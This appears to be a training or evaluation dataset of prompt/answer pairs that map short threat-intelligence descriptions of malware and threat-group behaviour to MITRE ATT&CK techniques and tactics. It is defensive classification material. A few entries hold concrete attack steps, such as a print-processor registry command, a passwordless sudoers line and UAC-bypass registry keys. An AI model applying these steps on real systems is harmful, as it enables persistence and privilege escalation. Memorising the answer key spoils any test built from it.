+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has added the Registry key `HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint” /v Driver /d “spool.dll /f` to load malware as a Print Processor.,"Tecnique: T1547.012 Boot or Logon Autostart Execution: Print Processors, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can drop itself in C:\Windows\System32\spool\prtprocs\x64\winprint.dll to be loaded automatically by the spoolsv Windows service.,"Tecnique: T1547.012 Boot or Logon Autostart Execution: Print Processors, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The PipeMon installer has modified the Registry key HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors to install PipeMon as a Print Processor.,"Tecnique: T1547.012 Boot or Logon Autostart Execution: Print Processors, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrossRAT can use an XDG Autostart to establish persistence.,"Tecnique: T1547.013 Boot or Logon Autostart Execution: XDG Autostart Entries, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If executing without root privileges, Fysbis adds a `.desktop` configuration file to the user's `~/.config/autostart` directory.","Tecnique: T1547.013 Boot or Logon Autostart Execution: XDG Autostart Entries, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can use XDG Autostart Entries to establish persistence on Linux systems.,"Tecnique: T1547.013 Boot or Logon Autostart Execution: XDG Autostart Entries, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can use an XDG Autostart to establish persistence.,"Tecnique: T1547.013 Boot or Logon Autostart Execution: XDG Autostart Entries, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: When executing with user-level permissions, RotaJakiro can install persistence using a .desktop file under the `$HOME/.config/autostart/` folder.","Tecnique: T1547.013 Boot or Logon Autostart Execution: XDG Autostart Entries, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy creates a Registry key in the Active Setup pointing to a malicious executable.,"Tecnique: T1547.014 Boot or Logon Autostart Execution: Active Setup, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok uses AppleScript to install a login Item by sending Apple events to the System Events process.,"Tecnique: T1547.015 Boot or Logon Autostart Execution: Login Items, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can add Login Items to establish persistence.,"Tecnique: T1547.015 Boot or Logon Autostart Execution: Login Items, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can persist via startup options for Login items.,"Tecnique: T1547.015 Boot or Logon Autostart Execution: Login Items, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux can execute commands with high privileges via a specific binary with setuid functionality.,"Tecnique: T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Keydnap adds the setuid flag to a binary so it can easily elevate in the future.,"Tecnique: T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors used the malicious NTWDBLIB.DLL and `cliconfig.exe` to bypass UAC protections.","Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has bypassed UAC.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used a Windows 10 specific tool and xxmm to bypass UAC for privilege escalation.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has bypassed UAC.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used the Fodhelper UAC bypass technique to gain elevated privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Evilnum has used PowerShell to bypass UAC.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater uses various techniques to bypass UAC.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork bypassed User Access Control (UAC).,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has presented the user with a UAC prompt to elevate privileges while installing.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AutoIt backdoor attempts to escalate privileges by bypassing User Access Control.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon bypasses UAC using the CMSTPLUA COM interface.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can utilize the CMSTPLUA COM interface and the SilentCleanup task to bypass UAC.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit has attempted to bypass UAC and gain elevated administrative privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can suppress UAC prompts by setting the HKCU\Software\Classes\ms-settings\shell\open\command registry key on Windows 10 or HKCU\Software\Classes\mscfile\shell\open\command on Windows 7 and launching the eventvwr.msc process, which launches BitPaymer with elevated privileges.","Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can bypass UAC to escalate privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy attempts to bypass default User Access Control (UAC) settings by exploiting a backward-compatibility setting found in Windows 7 and later.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has the ability to bypass UAC to deploy post exploitation tools with elevated privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has the ability to bypass UAC using a `passuac.dll` file.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use a number of known techniques to bypass Windows UAC.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate uses two distinct User Account Control (UAC) bypass techniques to escalate privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Downdelph bypasses UAC to escalate privileges by using a custom “RedirectEXE” shim database.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire includes various modules to attempt to bypass UAC for escalation of privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher performs UAC bypass.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can bypass UAC to elevate process privileges on a compromised host.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can bypass UAC by registering as the default handler for .MSC files.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can use fileless UAC bypass and create an elevated COM object to escalate privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS will perform UAC bypass either through fodhelper.exe or eventvwr.exe.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has bypassed UAC by performing token impersonation as well as an RPC-based method, this included bypassing UAC set to “AlwaysNotify"".","Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic has 2 methods for elevating integrity. It can bypass UAC through `eventvwr.exe` and `sdclt.exe`.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has utilized multiple techniques to bypass UAC.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An older variant of PLAINTEE performs UAC bypass.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon installer can use UAC bypass techniques to install the payload.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can utilize multiple methods to bypass UAC.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.","Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can generate a UAC pop-up Window to prompt the target user to run a command as the administrator.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can bypass UAC to escalate privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.","Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can use UACMe for privilege escalation.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos has a command for UAC bypassing.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY contains a number of modules that can bypass UAC, including through Window's Device Manager, Manage Optional Features, and an image hijack on the `.msc` file extension.","Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has attempted to bypass UAC using `fodhelper.exe` to escalate privileges.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sakula contains UAC bypass code for both 32- and 64-bit systems.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon attempts to disable UAC remote restrictions by modifying the Registry.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UACMe contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can use `sdclt.exe` to bypass UAC in Windows 10 to escalate privileges; for older Windows versions WarzoneRAT can use the IFileOperation exploit to bypass the UAC module.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker can perform a UAC bypass if it is not executed with administrator rights or if the infected host runs Windows Vista or later.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can use a variant of the sysprep UAC bypass.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Many ZeroT samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.,"Tecnique: T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use sudo to run a command.,"Tecnique: T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok adds admin ALL=(ALL) NOPASSWD: ALL to the /etc/sudoers file.,"Tecnique: T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton modifies the tty_tickets line in the sudoers file.,"Tecnique: T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer can escalate privileges to root by asking the user for credentials.,"Tecnique: T1548.004 Abuse Elevation Control Mechanism: Elevated Execution with Prompt, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used forged SAML tokens that allowed the actors to impersonate users and bypass MFA, enabling APT29 to access enterprise cloud applications and services.","Tecnique: T1550 Use Alternate Authentication Material, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can allow abuse of a compromised AD FS server's SAML token.,"Tecnique: T1550 Use Alternate Authentication Material, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used compromised service principals to make changes to the Office 365 environment.","Tecnique: T1550.001 Use Alternate Authentication Material: Application Access Token, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail.","Tecnique: T1550.001 Use Alternate Authentication Material: Application Access Token, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.,"Tecnique: T1550.001 Use Alternate Authentication Material: Application Access Token, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can use stolen service account tokens to perform its operations. It also enables adversaries to switch between valid service accounts.,"Tecnique: T1550.001 Use Alternate Authentication Material: Application Access Token, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used pass-the-hash tools to obtain authenticated access to sensitive internal desktops and servers.","Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The APT1 group is known to have used pass the hash.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used pass the hash for lateral movement.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used pass the hash for lateral movement.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 uses tools such as Mimikatz to enable lateral movement via captured password hashes.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has dumped password hashes for use in pass the hash authentication attacks.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used the PowerShell utility `Invoke-SMBExec` to execute the pass the hash method for lateral movement within an compromised environment.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used dumped hashes to authenticate to other machines via pass the hash.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used pass the hash for authentication to remote access software used in C2.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used the `Invoke-SMBExec` PowerShell cmdlet to execute the pass-the-hash technique and utilized stolen password hashes to move laterally.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can perform pass the hash on compromised machines with x64 versions.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can perform pass the hash.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can pass the hash to authenticate via SMB.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can perform pass the hash attacks.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has been observed loading several APIs associated with Pass the Hash.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz's SEKURLSA::Pth module can impersonate a user, with only a password hash, to execute arbitrary commands.","Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pass-The-Hash Toolkit can perform pass the hash.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 has a number of modules that leverage pass the hash for lateral movement.,"Tecnique: T1550.002 Use Alternate Authentication Material: Pass the Hash, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 used Kerberos ticket attacks for lateral movement.,"Tecnique: T1550.003 Use Alternate Authentication Material: Pass the Ticket, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 successfully gained remote access by using pass the ticket.,"Tecnique: T1550.003 Use Alternate Authentication Material: Pass the Ticket, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.,"Tecnique: T1550.003 Use Alternate Authentication Material: Pass the Ticket, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz’s LSADUMP::DCSync and KERBEROS::PTT modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.,"Tecnique: T1550.003 Use Alternate Authentication Material: Pass the Ticket, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can also perform pass-the-ticket.,"Tecnique: T1550.003 Use Alternate Authentication Material: Pass the Ticket, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some SeaDuke samples have a module to use pass the ticket with Kerberos for authentication.,"Tecnique: T1550.003 Use Alternate Authentication Material: Pass the Ticket, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used stolen cookies to access cloud resources and a forged `duo-sid` cookie to bypass MFA set on an email account.","Tecnique: T1550.004 Use Alternate Authentication Material: Web Session Cookie, Tactic: TA0005 Defense Evasion TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth uses an external software known as NetPass to recover passwords.,"Tecnique: T1552 Unsecured Credentials, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate uses NirSoft tools to steal user credentials from the infected machine. NirSoft tools are executed via process hollowing in a newly-created instance of vbc.exe or regasm.exe.,"Tecnique: T1552 Unsecured Credentials, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can search for sensitive data: for example, in Code Build environment variables, EC2 user data, and Cloud Formation templates.","Tecnique: T1552 Unsecured Credentials, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used a variety of publicly available tools like LaZagne to gather credentials.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has obtained administrative credentials by browsing through local files on a compromised machine.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has accessed files to gain valid credentials.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used tools that are capable of obtaining credentials from saved mail.,"Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used several tools for retrieving login and password information, including LaZagne.","Tecnique: T1552.001 Unsecured Credentials: Credentials In Files, Tactic: TA0006 Credential Access"
